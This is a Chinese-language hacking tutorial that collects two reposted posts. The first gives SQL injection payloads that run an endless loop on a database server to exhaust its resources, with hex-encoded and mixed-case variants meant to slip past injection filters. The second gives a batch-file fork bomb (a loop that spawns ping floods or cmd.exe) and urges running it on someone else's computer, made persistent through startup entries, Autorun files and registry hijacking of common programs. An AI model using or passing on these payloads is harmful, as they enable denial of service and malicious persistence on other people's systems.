注入死循環(huán)

    來(lái)源：華夏 同盟

    有時(shí)候，我們通過(guò)數(shù)據(jù)庫(kù)備份一個(gè)批處理到啟動(dòng)菜單后，希望服務(wù)器在下次重啟時(shí)運(yùn)行我們的批處理，

令服務(wù)器重啟的死循環(huán)

    以下注入代碼讓服務(wù)器停止響應(yīng)，或響應(yīng)很慢，要取得更好的效果，請(qǐng)丟到注入點(diǎn)后多執(zhí)行幾次。最終管理員會(huì)重新啟動(dòng)服務(wù)器。

    數(shù)字型注入點(diǎn)：

    ;wHiLe 1<9 bEgIn select cHaR(0) eNd--

    文本型注入點(diǎn)：

    ';wHiLe 1<9 bEgIn select cHaR(0) eNd--

    或者以 Declare + EXEC 的方式來(lái)執(zhí)行：

    ;dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

    ';dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

    以上代碼在數(shù)據(jù)庫(kù)服務(wù)器上制造死循環(huán)導(dǎo)致服務(wù)器資源被耗盡進(jìn)而拒絕服務(wù)。 管理員會(huì)幫你重啟服務(wù)器。

    注：以上代碼具有攻擊性，請(qǐng)謹(jǐn)慎使用。

    注：其中的 select char(0) 可以改成 select power(1.23456,100) 以加大計(jì)算量。

    -----------------夾煙占位--------------------

    ;wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

    這句的意思是當(dāng)1小9開(kāi)始將0這個(gè)反轉(zhuǎn)ASCII碼。因?yàn)槭呛愠闪⒌乃�以是個(gè)死循環(huán)。一直到機(jī)器資源用盡

    改字符大小是為了繞過(guò)網(wǎng)站的過(guò)濾防注入。

    ;declare @s varchar(8000) set @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 exec(@s)--

    declare @s varchar(8000)定義@s為varchar型長(zhǎng)度8000。將“wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd”用HEX編碼后符值給@s，再用exec執(zhí)行。。

    作用同樣是繞過(guò)網(wǎng)站的過(guò)濾防注入

    ';wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

    加'因?yàn)樗�是字符型注入。反正我是解說(shuō)不清楚了。

    select power(1.23456,100)返回1.23456的100次方根，不死才怪呢

    concat函數(shù)就是將里邊的字符區(qū)別大小的的串聯(lián)起來(lái)，benchmark(9999999999999,md5('test')報(bào)告客戶端的運(yùn)行經(jīng)過(guò)時(shí)間，

電腦資料

    我不知道concat函數(shù)對(duì)攻擊起什么作用？ w hex編碼0x77 benchmark(9999999999999,md5(0x77) 這樣也許能繞過(guò)防注入

    亂寫一氣大牛見(jiàn)笑

    ----------------------------------------------------------------------------------------------------

    死循環(huán)之ping增強(qiáng)版

    來(lái)源：色蘿卜's bolg

    建議在虛擬機(jī)上試驗(yàn)

    或者在別人的電腦上運(yùn)行改批處理

    她可以讓她的電腦立馬無(wú)法響應(yīng)過(guò)來(lái)

    而不得不重啟機(jī)器

    如果你還毒的話可以把她放到啟動(dòng)項(xiàng)中

    還毒的話加一個(gè)Autorun文件，open=這個(gè)批處理路徑

    再毒的話在注冊(cè)表中鏡像劫持掉，讓她點(diǎn)擊QQ、MSN、IE等常用工具既

    激活批處理

    讓她折騰去

    雙核也測(cè)試過(guò)，只能重啟，反映響應(yīng)比以前簡(jiǎn)單的寫個(gè)

    loop循環(huán)還要強(qiáng)N倍

    呵呵

    還來(lái)不及敲shutdown -a

    關(guān)閉組等操作哦

    純屬娛樂(lè)

    對(duì)系統(tǒng)文件無(wú)傷害

    重啟后無(wú)礙

    附件中有我測(cè)試時(shí)的源文件，懶的話可以下載哦

    附源文件內(nèi)容

    注兩個(gè)文件解壓到同一目錄下

    啟動(dòng).bat

    @echo off

    color 2f

    echo.

    title 死循環(huán)之ping增強(qiáng)版-zzw制作

    echo ####################################################################

    echo # 死循環(huán)之ping增強(qiáng)版-zzw制作 #

    echo ####################################################################

    echo.

    :loop

    start zzw.bat

    goto :loop

    echo 啟動(dòng)完成

    zzw.bat

    @echo off

    ping 127.0.0.1 -l 65500 -t

    附前人死循環(huán)批處理

    @echo off

    :loop

    start cmd.exe

    goto :loop

    當(dāng)然：有人會(huì)問(wèn)為什么不把CMD.exe換成其他的應(yīng)用程序呢，可以的，但是前提你要知道她電腦有那些大的應(yīng)用軟件